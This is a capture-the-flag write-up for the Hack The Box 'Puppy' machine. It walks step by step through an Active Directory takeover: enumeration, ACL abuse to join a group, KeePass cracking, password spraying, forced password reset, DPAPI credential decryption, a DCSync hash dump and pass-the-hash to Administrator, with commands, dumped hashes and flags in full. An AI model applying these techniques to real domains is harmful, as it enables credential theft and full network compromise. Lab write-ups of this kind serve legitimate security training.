As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!
Nmap
[root@kali] /home/kali/Puppy
❯ nmap puppy.htb -sV
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
111/tcp open rpcbind 2-4 (RPC #100000)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open nlockmgr 1-4 (RPC #100021)
3260/tcp open iscsi?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
RPC
┌──(bolke㉿bolke)-[~/htb/puppy]
└─$ rpcclient 10.10.11.70 -U levi.james
Password for [WORKGROUP\levi.james]:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[levi.james] rid:[0x44f]
user:[ant.edwards] rid:[0x450]
user:[adam.silver] rid:[0x451]
user:[jamie.williams] rid:[0x452]
user:[steph.cooper] rid:[0x453]
user:[steph.cooper_adm] rid:[0x457]
rpcclient $>
SMBMAP
┌──(bolke㉿bolke)-[~/htb/puppy]
└─$ smbmap -H 10.10.11.70 -u levi.james -p 'KingofAkron2025!'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[\] Checking for open ports... [*] Detected 1 hosts serving SMB
[|] Authenticating... [/] Authenticating... [*] Established 1 SMB connections(s) and 1 authenticated session(s)
[-] Enumerating shares... [\] Enumerating shares... [|] Enumerating shares... [/] Enumerating shares... [-] Enumerating shares... [\] Enumerating shares... [|] Enumerating shares... [/] Enumerating shares... [-] Enumerating shares... [\] Enumerating shares...
[+] IP: 10.10.11.70:445 Name: puppy.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DEV NO ACCESS DEV-SHARE for PUPPY-DEVS
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
[|] Closing connections.. [/] Closing connections.. [-] Closing connections.. [*] Closed 1 connections
Bloodhound
puppy.htb dc.puppy.htb/etc/hosts
sudo ntpdate puppy.htb
run bloodhound-ce-python
──(bolke㉿bolke)-[~/htb/puppy]
└─$ bloodhound-ce-python -u 'levi.james' -p 'KingofAkron2025!' -d puppy.htb -ns 10.10.11.70 -c All --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.puppy.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.puppy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.puppy.htb
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 04S
INFO: Compressing output into 20250604181821_bloodhound.zip
Start the Bloodhound Docker : ┌──(bolke㉿bolke)-[~/htb/puppy]
└─$ sudo docker-compose -f /opt/bloodhoundce/docker-compose.yml up
[sudo] password for bolke:
Starting bloodhoundce_graph-db_1 ... done
Starting bloodhoundce_app-db_1 ... done
Starting bloodhoundce_bloodhound_1 ... done
Attaching to bloodhoundce_app-db_1, bloodhoundce_graph-db_1, bloodhoundce_bloodhound_1
app-db_1 |
app-db_1 | PostgreSQL Database directory appears to contain a database; Skipping initialization
app-db_1 |
app-db_1 | 2025-06-04 20:54:07.332 UTC [1] LOG: starting PostgreSQL 16.8 (Debian 16.8-1.pgdg120+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 12.2.0-14) 12.2.0, 64-bit
...
We find :
We can see that the james user has write permission to the developers group, so we can write ourselves to that group.
┌──(bolke㉿bolke)-[~/htb/puppy]
└─$ bloodyAD --host '10.10.11.70' -d 'dc.puppy.htb' -u 'levi.james' -p 'KingofAkron2025!' add groupMember DEVELOPERS levi.james
[+] levi.james added to DEVELOPERS
Then you can enter the SMB DEV directory
Keepass Brute
┌──(bolke㉿bolke)-[~/htb/puppy]
└─$ smbclient //10.10.11.70/DEV -U levi.james
Password for [WORKGROUP\levi.james]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sun Mar 23 08:07:57 2025
.. D 0 Sat Mar 8 17:52:57 2025
KeePassXC-2.7.9-Win64.msi A 34394112 Sun Mar 23 08:09:12 2025
Projects D 0 Sat Mar 8 17:53:36 2025
recovery.kdbx A 2677 Wed Mar 12 03:25:46 2025
5080575 blocks of size 4096. 1648863 blocks available
smb: \> mget *
Get file KeePassXC-2.7.9-Win64.msi? y
getting file \KeePassXC-2.7.9-Win64.msi of size 34394112 as KeePassXC-2.7.9-Win64.msi (4810.7 KiloBytes/sec) (average 4810.7 KiloBytes/sec)
Get file recovery.kdbx? y
getting file \recovery.kdbx of size 2677 as recovery.kdbx (68.8 KiloBytes/sec) (average 4785.0 KiloBytes/sec)
smb: \>
.
I tried to use the built-in keepass2john on the downloaded keepass db but it showed the wrong version.
❯ keepass2john recovery.kdbx
! recovery.kdbx : File version '40000' is currently not supported!
so we use : keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute
┌──(bolke㉿bolke)-[~/htb/puppy/keepass4brute]
└─$ ./keepass4brute.sh ../recovery.kdbx /usr/share/wordlists/rockyou.txt
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute
[+] Words tested: 36/14344392 - Attempts per minute: 86 - Estimated time remaining: 16 weeks, 3 days
[+] Current attempt: liverpool
[*] Password found: liverpool
Got the password liverpool, here I use keepassxc to open the file
We can get some password values
HJKL2025!
Antman2025!
JamieLove2025!
ILY2025!
Steve2025!
Netexec
┌──(bolke㉿bolke)-[~/htb/puppy/keepass4brute] └─$ netexec smb 10.10.11.70 -u usernames.txt -p pass.txt SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False) SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:HJKL2025! STATUS_LOGON_FAILURE SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:HJKL2025! STATUS_LOGON_FAILURE SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:HJKL2025! STATUS_LOGON_FAILURE SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:HJKL2025! STATUS_LOGON_FAILURE SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:HJKL2025! STATUS_LOGON_FAILURE SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:HJKL2025! STATUS_LOGON_FAILURE SMB 10.10.11.70 445 DC [-] PUPPY.HTB\:HJKL2025! STATUS_LOGON_FAILURE SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:Antman2025! STATUS_LOGON_FAILURE SMB 10.10.11.70 445 DC [+] PUPPY.HTB\ant.edwards:Antman2025!
We have valid new creds:ant.edwards/Antman2025!
Bloodhound
❯ bloodhound-python -u 'ant.edwards' -p 'Antman2025!' -d puppy.htb -ns 10.10.11.70 -c All --zip
You can see that the group that Edwards belongs to has full control over adam.silver, so you can change his password.
Password Reset
┌──(bolke㉿bolke)-[~/htb/puppy/keepass4brute] └─$ bloodyAD --host '10.10.11.70' -d 'dc.puppy.htb' -u 'ant.edwards' -p 'Antman2025!' set password ADAM.SILVER Start123! [+] Password changed successfully!
[root@kali] /home/kali/Puppy
❯ bloodyAD --host '10.10.11.70' -d 'dc.puppy.htb' -u 'ant.edwards' -p 'Antman2025!' set password ADAM.SILVER Abc123456! ⏎
[+] Password changed successfully!
Although the changes here were successful, I still couldn’t log in. I found that the account was not enabled.
Enable Account
ldapsearch
┌──(bolke㉿bolke)-[~/htb/puppy/keepass4brute]
└─$ ldapsearch -x -H ldap://10.10.11.70 -D "ANT.EDWARDS@PUPPY.HTB" -W -b "DC=puppy,DC=htb" "(sAMAccountName=ADAM.SILVER)"
Enter LDAP Password: Antman2025! # extended LDIF # # LDAPv3 # base <DC=puppy,DC=htb> with scope subtree # filter: (sAMAccountName=ADAM.SILVER) # requesting: ALL # # Adam D. Silver, Users, PUPPY.HTB dn: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: Adam D. Silver sn: Silver givenName: Adam initials: D distinguishedName: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB instanceType: 4 whenCreated: 20250219121623.0Z whenChanged: 20250604165325.0Z displayName: Adam D. Silver uSNCreated: 12814 memberOf: CN=DEVELOPERS,DC=PUPPY,DC=HTB memberOf: CN=Remote Management Users,CN=Builtin,DC=PUPPY,DC=HTB uSNChanged: 172177 name: Adam D. Silver objectGUID:: 6XTdGwRTsk6ta8cxNx8K6w== userAccountControl: 66050 badPwdCount: 1 codePage: 0 countryCode: 0 homeDirectory: C:\Users\adam.silver badPasswordTime: 133935291993813401 lastLogoff: 0 lastLogon: 133863842265461471 pwdLastSet: 133935296057250953 primaryGroupID: 513 userParameters:: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI CAgUAQaCAFDdHhDZmdQcmVzZW5045S15pSx5oiw44GiGAgBQ3R4Q2ZnRmxhZ3Mx44Cw44Gm44Cy44 C5EggBQ3R4U2hhZG9344Cw44Cw44Cw44CwKgIBQ3R4TWluRW5jcnlwdGlvbkxldmVs44Sw objectSid:: AQUAAAAAAAUVAAAAQ9CwWJ8ZBW3HmPiHUQQAAA== adminCount: 1 accountExpires: 9223372036854775807 logonCount: 6 sAMAccountName: adam.silver sAMAccountType: 805306368 userPrincipalName: adam.silver@PUPPY.HTB objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=PUPPY,DC=HTB dSCorePropagationData: 20250309210803.0Z dSCorePropagationData: 20250228212238.0Z dSCorePropagationData: 20250219143627.0Z dSCorePropagationData: 20250219142657.0Z dSCorePropagationData: 16010101000000.0Z lastLogonTimestamp: 133863576267401674 # search reference ref: ldap://ForestDnsZones.PUPPY.HTB/DC=ForestDnsZones,DC=PUPPY,DC=HTB # search reference ref: ldap://DomainDnsZones.PUPPY.HTB/DC=DomainDnsZones,DC=PUPPY,DC=HTB # search reference ref: ldap://PUPPY.HTB/CN=Configuration,DC=PUPPY,DC=HTB # search result search: 2 result: 0 Success # numResponses: 5 # numEntries: 1 # numReferences: 3
ldapmodify
ldapmodify -x -H ldap://10.10.11.70 -D "ANT.EDWARDS@PUPPY.HTB" -W << EOF
dn: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
changetype: modify
replace: userAccountControl
userAccountControl: 66048
EOF
└─$ ldapmodify -x -H ldap://10.10.11.70 -D "ANT.EDWARDS@PUPPY.HTB" -W << EOF
heredoc> dn: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
heredoc> changetype: modify
heredoc> replace: userAccountControl
heredoc> userAccountControl: 66048
heredoc> EOF
Enter LDAP Password: Antman2025! modifying entry "CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB"
.
┌──(bolke㉿bolke)-[~/htb/puppy/keepass4brute]
└─$ evil-winrm -i puppy.htb -u 'ADAM.SILVER' -p 'Start123!'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adam.silver\Documents> type ../Desktop/user.txt
5ff595da8f6d511b68a35f5971ede168
*Evil-WinRM* PS C:\Users\adam.silver\Documents>
Privilege Escalation
bloodhound
❯ bloodhound-python -u 'ADAM.SILVER' -p 'Start123!' -d puppy.htb -ns 10.10.11.70 -c All --zip ⏎
Check that there is a Backup directory under the root directory
*Evil-WinRM* PS C:\Users\adam.silver\Documents> cd c:\backups
*Evil-WinRM* PS C:\backups> ls
Directory: C:\backups
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/8/2025 8:22 AM 4639546 site-backup-2024-12-30.zip
*Evil-WinRM* PS C:\backups> download site-backup-2024-12-30.zip
Info: Downloading C:\backups\site-backup-2024-12-30.zip to site-backup-2024-12-30.zip
Info: Download successful!
*Evil-WinRM* PS C:\backups>
After decompression, you will see a bak file with a user credential: steph.cooper/ChefSteph2025!, which can be used to log in.
❯ cat nms-auth-config.xml.bak
<?xml version="1.0" encoding="UTF-8"?>
<ldap-config>
<server>
<host>DC.PUPPY.HTB</host>
<port>389</port>
<base-dn>dc=PUPPY,dc=HTB</base-dn>
<bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
<bind-password>ChefSteph2025!</bind-password>
</server>
<user-attributes>
<attribute name="username" ldap-attribute="uid" />
<attribute name="firstName" ldap-attribute="givenName" />
<attribute name="lastName" ldap-attribute="sn" />
<attribute name="email" ldap-attribute="mail" />
</user-attributes>
<group-attributes>
<attribute name="groupName" ldap-attribute="cn" />
<attribute name="groupMember" ldap-attribute="member" />
</group-attributes>
<search-filter>
<filter>(&(objectClass=person)(uid=%s))</filter>
</search-filter>
</ldap-config>
bloodhound
❯ bloodhound-python -u 'steph.cooper' -p 'ChefSteph2025!' -d puppy.htb -ns 10.10.11.70 -c All --zip
There is nothing special about it. Combined with something similar to DPAPI found on the silver desktop before
Try looking for it here from steph. First, you need to get the credentials saved in Windows Credential Manager. It uses DPAPI encryption (CryptProtectData) to bind the user or computer’s MasterKey.
┌──(bolke㉿bolke)-[~/htb/puppy/keepass4brute]
└─$ evil-winrm -i puppy.htb -u 'STEPH.COOPER' -p 'ChefSteph2025!'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> cd C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> dir -h
Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 7:54 AM 414 C8D69EBE9A43E9DEBF6B5FBD48B521B9
Downloading directly here seems to result in an error.
Abusing DPAPI Secrets to Move Laterally (impacket-dpapi)
Once we get access to the Domain Controller, the next goal will be to scale privileges and finally become Domain Admins.
Looking for possible climbing vectors, we identified the option of abusing DPAPI (Data Protection API), which can allow us to access protected credentials and move laterally through the domain.
On the following routes it is where the credentials protected by DPAPI are usually stored.
In the case of the user steph.cooper has a credential called C8D69EBE9A43E9DEBF6B5FBD48B521B9located in C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials.
This credential is hidden, so you can unload it through the module downloadwhich offers evil-winrm, we must remove the attribute Hiddenand System. Then, you will let us download the file to our local computer.
.
*Evil-WinRM* PS C:\users\steph.cooper\AppData\Roaming\Microsoft\Credentials> dir -h
Directory: C:\users\steph.cooper\AppData\Roaming\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 7:54 AM 414 C8D69EBE9A43E9DEBF6B5FBD48B521B9
*Evil-WinRM* PS C:\users\steph.cooper\AppData\Roaming\Microsoft\Credentials> attrib -h -s C8D69EBE9A43E9DEBF6B5FBD48B521B9
*Evil-WinRM* PS C:\users\steph.cooper\AppData\Roaming\Microsoft\Credentials> download C8D69EBE9A43E9DEBF6B5FBD48B521B9
Info: Downloading C:\users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9 to C8D69EBE9A43E9DEBF6B5FBD48B521B9
Info: Download successful!
*Evil-WinRM* PS C:\users\steph.cooper\AppData\Roaming\Microsoft\Credentials>
.
DPAPIDPAPI-protected credentials are encrypted using a specific Master Key user, derived from your password.
These Master Keys are usually stored on the following route:
In our case, we found two possible Master Keys in that location. We know that one of them is the one used to protect the credential we downloaded before.
Tools like Mimikatz or winPEAS allow them to directly identify which Master Key corresponds to each secret, but in this case we did it manually by testing both, and we determined that the correct one was: 556a2412-1275-4ccf-b721-e6a0b4f90407.
Since he has the attributes Hiddenand SystemWe’ll take them away through attrib -h -sand we can download the master key through the module downloadof evil-winrm.
*Evil-WinRM* PS C:\users\steph.cooper\AppData\Roaming\Microsoft\Protect> ls
Directory: C:\users\steph.cooper\AppData\Roaming\Microsoft\Protect
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 2/23/2025 2:36 PM S-1-5-21-1487982659-1829050783-2281216199-1107
-a---- 6/4/2025 1:30 PM 45272 nc64.exe
*Evil-WinRM* PS C:\users\steph.cooper\AppData\Roaming\Microsoft\Protect> cd S-1-5-21-1487982659-1829050783-2281216199-1107
*Evil-WinRM* PS C:\users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107> ls
*Evil-WinRM* PS C:\users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107> dir -h
Directory: C:\users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 7:40 AM 740 556a2412-1275-4ccf-b721-e6a0b4f90407
-a-hs- 2/23/2025 2:36 PM 24 Preferred
*Evil-WinRM* PS C:\users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107> attrib -h -s 556a2412-1275-4ccf-b721-e6a0b4f90407
*Evil-WinRM* PS C:\users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107> download 556a2412-1275-4ccf-b721-e6a0b4f90407
Info: Downloading C:\users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407 to 556a2412-1275-4ccf-b721-e6a0b4f90407
Info: Download successful!
Finally we managed to decrypt the Master Key successfully.
┌──(bolke㉿bolke)-[~/htb/puppy] └─$ impacket-dpapi masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -password 'ChefSteph2025!' -sid S-1-5-21-1487982659-1829050783-2281216199-1107 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [MASTERKEYFILE] Version : 2 (2) Guid : 556a2412-1275-4ccf-b721-e6a0b4f90407 Flags : 0 (0) Policy : 4ccf1275 (1288639093) MasterKeyLen: 00000088 (136) BackupKeyLen: 00000068 (104) CredHistLen : 00000000 (0) DomainKeyLen: 00000174 (372) Decrypted key with User Key (MD4 protected) Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Finally, we’re going to decipher the DPAPI-protected credential using the Master Key we recovered in the previous step.
To do this we will need:
-
The file of the protected credential we downloaded previously (
CC8D69EBE9A43E9DEBF6B5FBD48B521B9). -
The Master Key decrypted.
At the exit we get what appears to be a new set of credentials, corresponding to the user steph.cooper_adm@puppy.htbalong with your password.
┌──(bolke㉿bolke)-[~/htb/puppy] └─$ impacket-dpapi credential -file C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [CREDENTIAL] LastWritten : 2025-03-08 15:54:29 Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH) Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE) Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD) Target : Domain:target=PUPPY.HTB Description : Unknown : Username : steph.cooper_adm Unknown : FivethChipOnItsWay2025!
So now we have plain credentials of steph.cooper_adm
bloodhound
[root@kali] /home/kali/Puppy ❯ bloodhound-python -u 'steph.cooper_adm' -p 'FivethChipOnItsWay2025!' -d puppy.htb -ns 10.10.11.70 -c All --zip DCSync
.
┌──(bolke㉿bolke)-[~/htb/puppy] └─$ impacket-secretsdump 'puppy.htb/steph.cooper_adm:FivethChipOnItsWay2025!'@10.10.11.70 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0xa943f13896e3e21f6c4100c7da9895a6 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:9c541c389e2904b9b112f599fd6b333d::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] $MACHINE.ACC PUPPY\DC$:aes256-cts-hmac-sha1-96:f4f395e28f0933cac28e02947bc68ee11b744ee32b6452dbf795d9ec85ebda45 PUPPY\DC$:aes128-cts-hmac-sha1-96:4d596c7c83be8cd71563307e496d8c30 PUPPY\DC$:des-cbc-md5:54e9a11619f8b9b5 PUPPY\DC$:plain_password_hex:84880c04e892448b6419dda6b840df09465ffda259692f44c2b3598d8f6b9bc1b0bc37b17528d18a1e10704932997674cbe6b89fd8256d5dfeaa306dc59f15c1834c9ddd333af63b249952730bf256c3afb34a9cc54320960e7b3783746ffa1a1528c77faa352a82c13d7c762c34c6f95b4bbe04f9db6164929f9df32b953f0b419fbec89e2ecb268ddcccb4324a969a1997ae3c375cc865772baa8c249589e1757c7c36a47775d2fc39e566483d0fcd48e29e6a384dc668228186a2196e48c7d1a8dbe6b52fc2e1392eb92d100c46277e1b2f43d5f2b188728a3e6e5f03582a9632da8acfc4d992899f3b64fe120e13 PUPPY\DC$:aad3b435b51404eeaad3b435b51404ee:d5047916131e6ba897f975fc5f19c8df::: [*] DPAPI_SYSTEM dpapi_machinekey:0xc21ea457ed3d6fd425344b3a5ca40769f14296a3 dpapi_userkey:0xcb6a80b44ae9bdd7f368fb674498d265d50e29bf [*] NL$KM 0000 DD 1B A5 A0 33 E7 A0 56 1C 3F C3 F5 86 31 BA 09 ....3..V.?...1.. 0010 1A C4 D4 6A 3C 2A FA 15 26 06 3B 93 E0 66 0F 7A ...j<*..&.;..f.z 0020 02 9A C7 2E 52 79 C1 57 D9 0C D3 F6 17 79 EF 3F ....Ry.W.....y.? 0030 75 88 A3 99 C7 E0 2B 27 56 95 5C 6B 85 81 D0 ED u.....+'V.\k.... NL$KM:dd1ba5a033e7a0561c3fc3f58631ba091ac4d46a3c2afa1526063b93e0660f7a029ac72e5279c157d90cd3f61779ef3f7588a399c7e02b2756955c6b8581d0ed [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb0edc15e49ceb4120c7bd7e6e65d75b::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a4f2989236a639ef3f766e5fe1aad94a::: PUPPY.HTB\levi.james:1103:aad3b435b51404eeaad3b435b51404ee:ff4269fdf7e4a3093995466570f435b8::: PUPPY.HTB\ant.edwards:1104:aad3b435b51404eeaad3b435b51404ee:afac881b79a524c8e99d2b34f438058b::: PUPPY.HTB\adam.silver:1105:aad3b435b51404eeaad3b435b51404ee:6dfcb20c87d04f9a4f9605f2413395d4::: PUPPY.HTB\jamie.williams:1106:aad3b435b51404eeaad3b435b51404ee:bd0b8a08abd5a98a213fc8e3c7fca780::: PUPPY.HTB\steph.cooper:1107:aad3b435b51404eeaad3b435b51404ee:b261b5f931285ce8ea01a8613f09200b::: PUPPY.HTB\steph.cooper_adm:1111:aad3b435b51404eeaad3b435b51404ee:ccb206409049bc53502039b80f3f1173::: DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5047916131e6ba897f975fc5f19c8df::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:c0b23d37b5ad3de31aed317bf6c6fd1f338d9479def408543b85bac046c596c0 Administrator:aes128-cts-hmac-sha1-96:2c74b6df3ba6e461c9d24b5f41f56daf Administrator:des-cbc-md5:20b9e03d6720150d krbtgt:aes256-cts-hmac-sha1-96:f2443b54aed754917fd1ec5717483d3423849b252599e59b95dfdcc92c40fa45 krbtgt:aes128-cts-hmac-sha1-96:60aab26300cc6610a05389181e034851 krbtgt:des-cbc-md5:5876d051f78faeba PUPPY.HTB\levi.james:aes256-cts-hmac-sha1-96:2aad43325912bdca0c831d3878f399959f7101bcbc411ce204c37d585a6417ec PUPPY.HTB\levi.james:aes128-cts-hmac-sha1-96:661e02379737be19b5dfbe50d91c4d2f PUPPY.HTB\levi.james:des-cbc-md5:efa8c2feb5cb6da8 PUPPY.HTB\ant.edwards:aes256-cts-hmac-sha1-96:107f81d00866d69d0ce9fd16925616f6e5389984190191e9cac127e19f9b70fc PUPPY.HTB\ant.edwards:aes128-cts-hmac-sha1-96:a13be6182dc211e18e4c3d658a872182 PUPPY.HTB\ant.edwards:des-cbc-md5:835826ef57bafbc8 PUPPY.HTB\adam.silver:aes256-cts-hmac-sha1-96:b339e35b14708f0bd46456c38ec76ac0cdba40ac07c1c00d7b58b3f7c2bc4ae4 PUPPY.HTB\adam.silver:aes128-cts-hmac-sha1-96:70a5f915855b63fb3dd5924529189727 PUPPY.HTB\adam.silver:des-cbc-md5:1feacda464daa1e9 PUPPY.HTB\jamie.williams:aes256-cts-hmac-sha1-96:aeddbae75942e03ac9bfe92a05350718b251924e33c3f59fdc183e5a175f5fb2 PUPPY.HTB\jamie.williams:aes128-cts-hmac-sha1-96:d9ac02e25df9500db67a629c3e5070a4 PUPPY.HTB\jamie.williams:des-cbc-md5:cb5840dc1667b615 PUPPY.HTB\steph.cooper:aes256-cts-hmac-sha1-96:799a0ea110f0ecda2569f6237cabd54e06a748c493568f4940f4c1790a11a6aa PUPPY.HTB\steph.cooper:aes128-cts-hmac-sha1-96:cdd9ceb5fcd1696ba523306f41a7b93e PUPPY.HTB\steph.cooper:des-cbc-md5:d35dfda40d38529b PUPPY.HTB\steph.cooper_adm:aes256-cts-hmac-sha1-96:a3b657486c089233675e53e7e498c213dc5872d79468fff14f9481eccfc05ad9 PUPPY.HTB\steph.cooper_adm:aes128-cts-hmac-sha1-96:c23de8b49b6de2fc5496361e4048cf62 PUPPY.HTB\steph.cooper_adm:des-cbc-md5:6231015d381ab691 DC$:aes256-cts-hmac-sha1-96:f4f395e28f0933cac28e02947bc68ee11b744ee32b6452dbf795d9ec85ebda45 DC$:aes128-cts-hmac-sha1-96:4d596c7c83be8cd71563307e496d8c30 DC$:des-cbc-md5:7f044607a8dc9710 [*] Cleaning up...
.
┌──(bolke㉿bolke)-[~/htb/puppy]
└─$ evil-winrm -i 10.10.11.70 -u 'Administrator' -H 'bb0edc15e49ceb4120c7bd7e6e65d75b'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../desktop/root.txt
a46bbaf9b65c026f8ef2642ae464ba37
*Evil-WinRM* PS C:\Users\Administrator\Documents>
.
That was fun.